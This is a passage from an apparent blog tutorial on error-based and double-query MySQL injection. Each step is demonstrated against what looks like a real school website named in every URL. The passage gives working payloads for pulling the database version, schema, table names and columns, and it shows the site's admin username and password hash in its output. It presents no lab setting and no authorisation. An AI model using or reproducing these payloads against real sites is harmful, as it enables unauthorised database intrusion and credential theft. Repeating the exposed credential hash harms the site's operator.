&lt;p&gt;So the site will look like this:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.aliqbalschools.org/index.php?mode=getpagecontent&amp;amp;pageID=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Results:&lt;br&gt;&lt;img src=&quot;https://raw.githubusercontent.com/tudouya/blogSource/master/images/TIqze.png&quot; alt=&quot;&quot;&gt;  &lt;/p&gt;
&lt;p&gt;Now that we know the version of the database which is 5, lets move to the next step&lt;/p&gt;
&lt;h3 id=&quot;Second-step-Getting-the-database-name&quot;&gt;&lt;a href=&quot;#Second-step-Getting-the-database-name&quot; class=&quot;headerlink&quot; title=&quot;Second step: Getting the database name&quot;&gt;&lt;/a&gt;Second step: Getting the database name&lt;/h3&gt;&lt;p&gt;To get the database, we enter this query:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Notice the limit function in the query.A website can have more than 2 two databases, so increase the limit until you find all database names.Example: limit 0,1 or limit 1,1 or limit 2,1&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Now our website address will look like this:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.aliqbalschools.org/index.php?mode=getpagecontent&amp;amp;pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Second step is done where we extract the database names we need.MAKE sure you write the database name on a paper or notepad.We’ll need it later.&lt;/p&gt;
&lt;h3 id=&quot;Third-Step-Getting-the-TABLE-NAMES&quot;&gt;&lt;a href=&quot;#Third-Step-Getting-the-TABLE-NAMES&quot; class=&quot;headerlink&quot; title=&quot;Third Step: Getting the TABLE NAMES&quot;&gt;&lt;/a&gt;Third Step: Getting the TABLE NAMES&lt;/h3&gt;&lt;p&gt;Table names is what we need now.&lt;br&gt;Here’s the query we can use:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Don’t also forget the LIMIT function we used here to get table names one by one.&lt;br&gt;Alright our web address will look like this:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.aliqbalschools.org/index.php?mode=getpagecontent&amp;amp;pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Now here’s the important part:&lt;br&gt;When you search for tables keep incrementing the limit until you find the valuable table name&lt;br&gt;For example: LIMIT 0,1&lt;br&gt;LIMIT 1,1&lt;br&gt;LIMIT 2,1&lt;br&gt;Keep increasing the number until you find the table you want to extract the information from.&lt;br&gt;Here’s the formula: LIMIT N,1 where N is a random integer  &lt;/p&gt;
&lt;p&gt;So now we know our table, lets move on to the next step.&lt;/p&gt;
&lt;h3 id=&quot;Fourth-Step-Getting-Columns-from-specific-TABLE-NAMES&quot;&gt;&lt;a href=&quot;#Fourth-Step-Getting-Columns-from-specific-TABLE-NAMES&quot; class=&quot;headerlink&quot; title=&quot;Fourth Step: Getting Columns from specific TABLE NAMES&quot;&gt;&lt;/a&gt;Fourth Step: Getting Columns from specific TABLE NAMES&lt;/h3&gt;&lt;p&gt;Alright, now that you’ve chosen the table you wanna extract columns from, time to execute another query.&lt;br&gt;So here’s how a column query extraction will look like:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Notice the LIMIT 0,1 FUNCTION and 0xTABLEHEX.&lt;br&gt;You need to convert your specific table into hex and add 0x at the beginning of the string so that it can be readable to the website.&lt;br&gt;To convert a string to hex use: &lt;a href=&quot;http://www.swingnote.com/tools/texttohex.php&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.swingnote.com/tools/texttohex.php&lt;/a&gt;.&lt;br&gt;Here’s how the address will look like along with the query:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.aliqbalschools.org/index.php?mode=getpagecontent&amp;amp;pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Results:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;Duplicate entry &amp;apos;Id~1&amp;apos; for key &amp;apos;group_key&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Now you need to increment the limit until you find valuable columns such as userName and passWord.&lt;br&gt;So in this case,&lt;br&gt;Column name = userName&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.aliqbalschools.org/index.php?mode=getpagecontent&amp;amp;pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Column name= passWord&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.aliqbalschools.org/index.php?mode=getpagecontent&amp;amp;pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Again, don’t forget to see the LIMIT Function&lt;br&gt;Now that we found the columns we want to extract information from i.e “userName” and “passWord”, lets proceed to the next step where we can actually get the login username and password.&lt;/p&gt;
&lt;h3 id=&quot;Fifth-Step-Extracting-the-data-from-Columns&quot;&gt;&lt;a href=&quot;#Fifth-Step-Extracting-the-data-from-Columns&quot; class=&quot;headerlink&quot; title=&quot;Fifth Step: Extracting the data from Columns&quot;&gt;&lt;/a&gt;Fifth Step: Extracting the data from Columns&lt;/h3&gt;&lt;p&gt;Alright this part is probably the best in SQL injecting site.&lt;br&gt;Time to get the info from the columns we have.&lt;br&gt;To do that, use this query:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Now before you proceed, watch and focus on the code and study what happens.&lt;br&gt;Here we have 4 variables:  &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;COLUMN_NAME: where you insert the column name you want to extract information from&lt;br&gt;2.Databasename: where you insert the current database name of the website so that you’ll be extract info from it  &lt;/li&gt;
&lt;li&gt;TABLENAME: where you insert the table name of the column names you extracted from  &lt;/li&gt;
&lt;li&gt;LIMIT N,1: LIMIT Function and N where N is a random integer  &lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Now lets do some replacing, FOCUS&lt;br&gt;COLUMN_NAME replace with “userName” and “passWord”&lt;br&gt;Databasename replace with “iqbal_iqbal”&lt;br&gt;TABLENAME replace with “settings” &lt;/p&gt;
&lt;p&gt;After you’re done with altering the code to your needs of extracting information, time to execute it.&lt;br&gt;Here’s what the code will look like:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.aliqbalschools.org/index.php?mode=getpagecontent&amp;amp;pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Results:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;Duplicate entry &amp;apos;admin~86f574c1d63d53fa804c13c3213953d9~1&amp;apos; for key&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;h2 id=&quot;Now-Lets-Start-with-DOUBLE-Query-SQL-Injection&quot;&gt;&lt;a href=&quot;#Now-Lets-Start-with-DOUBLE-Query-SQL-Injection&quot; class=&quot;headerlink&quot; title=&quot;Now Lets Start with DOUBLE Query SQL Injection&quot;&gt;&lt;/a&gt;Now Lets Start with DOUBLE Query SQL Injection&lt;/h2&gt;&lt;p&gt;So basically, as stated above, DOUBLE Query is the same like Error Based except the query we’ll enter is gonna be double the normal error based query.&lt;br&gt;First off, the definition so that you can understand:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;Double query SQL injection is a vulnerability that uses two queries together wrapped into one that confuses the db to a point where it spits out an error. This error gives us the info we need to leverage the database all the way to the admin panel. As a matter of fact we can pretty much dump the whole database if we want.&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt; Differences: &lt;/strong&gt;&lt;br&gt;Error Based Query for Database Extraction:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Double Query for Database Extraction:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;and(select 1 from(select count(*),concat((select (select&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;information_schema.tables group by x)a) and 1=1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Now you get the idea, lets cut to the chase and go on.&lt;br&gt;We’ll be using the same site as above&lt;/p&gt;
&lt;h3 id=&quot;Step1-Getting-the-database-version&quot;&gt;&lt;a href=&quot;#Step1-Getting-the-database-version&quot; class=&quot;headerlink&quot; title=&quot;Step1: Getting the database version&quot;&gt;&lt;/a&gt;Step1: Getting the database version&lt;/h3&gt;&lt;p&gt;Alright same as Error Based, here’s the Double query:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;and(select 1 from(select count(*),concat((select (select&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;information_schema.tables group by x)a) and 1=1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;So our Address will look like this:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.aliqbalschools.org/index.php?mode=getpagecontent&amp;amp;pageID=21 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;NOTE(IMPORTANT): Make sure that your queries are very well organized when you execute them, otherwise the browser will return the results as an error.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Results after query execution:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;Duplicate entry &amp;apos;~&amp;apos;5.1.56-log&amp;apos;~1&amp;apos; for key &amp;apos;group_key&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;h3 id=&quot;Step2-Getting-the-Database&quot;&gt;&lt;a href=&quot;#Step2-Getting-the-Database&quot; class=&quot;headerlink&quot; title=&quot;Step2: Getting the Database&quot;&gt;&lt;/a&gt;Step2: Getting the Database&lt;/h3&gt;&lt;p&gt;Now we’ve got the version, lets execute a double query on extracting the database.&lt;br&gt;Query for Database extraction:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;and(select 1 from(select count(*),concat((select (select (SELECT distinct&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Notice the LIMIT Function again and make sure you don’t make mistakes in that&lt;br&gt;It shows that.&lt;br&gt;Limit N,1 where N is a random integer. Example: Limit 0,1.&lt;br&gt;Here’s what our address will then look like:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.aliqbalschools.org/index.php?mode=getpagecontent&amp;amp;pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Once more, don’t forget about the LIMIT Function.&lt;br&gt;So here’s the results:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;iqbal_iqbal&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;h3 id=&quot;Step3-Getting-the-Table-Names&quot;&gt;&lt;a href=&quot;#Step3-Getting-the-Table-Names&quot; class=&quot;headerlink&quot; title=&quot;Step3: Getting the Table Names&quot;&gt;&lt;/a&gt;Step3: Getting the Table Names&lt;/h3&gt;&lt;p&gt;As I’ve explained above, we’ll be also using the LIMIT Function in this query.&lt;br&gt;Just a quick look, the query will look like this:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;and(select 1 from(select count(*),concat((select (select (SELECT distinct&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;information_schema.tables group by x)a) and 1=1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Alright you need to focus on the code and see the changes.&lt;br&gt;There are two variables here:  &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Hex_code_databasename  &lt;/li&gt;
&lt;li&gt;LIMIT Function&lt;br&gt;Obviously, we need to Hex the database name we’ve just taken into record and add 0x in the beginning i.e. Database= 0xiqbal_iqbal.&lt;br&gt;To convert your database name into hex: &lt;a href=&quot;http://www.swingnote.com/tools/texttohex.php&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://www.swingnote.com/tools/texttohex.php&lt;/a&gt;.&lt;br&gt;Now that you’ve the database into hex, lets see what our address will look like:&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.aliqbalschools.org/index.php?mode=getpagecontent&amp;amp;pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x697162616c5f697162616c LIMIT 19,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;LIMIT 19,1 brings us the valuable table which is “settings”.&lt;br&gt;Review the code and study it.&lt;/p&gt;
&lt;h3 id=&quot;Step4-Getting-Column-names-from-specific-Tables-and-Database&quot;&gt;&lt;a href=&quot;#Step4-Getting-Column-names-from-specific-Tables-and-Database&quot; class=&quot;headerlink&quot; title=&quot;Step4: Getting Column names from specific Tables and Database&quot;&gt;&lt;/a&gt;Step4: Getting Column names from specific Tables and Database&lt;/h3&gt;&lt;p&gt;Now that we know what we need which are the table (settings) and database (iqbal_iqbal), lets proceed to the next step; column extraction.&lt;br&gt;Here’s what the query will look like:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;and(select 1 from(select count(*),concat((select (select (SELECT distinct&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tables&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Now here we have 3 variables:  &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Hex code of Databasename: Hex the database which in our case is (iqbal_iqbal)  &lt;/li&gt;
&lt;li&gt;Hex code of tablename: Hex the table name which is “settings”  &lt;/li&gt;
&lt;li&gt;LIMIT Function&lt;br&gt;Alright, I’m pretty sure you know what you have to do exactly so I don’t need to explain everything again and again.  &lt;/li&gt;
&lt;/ol&gt;
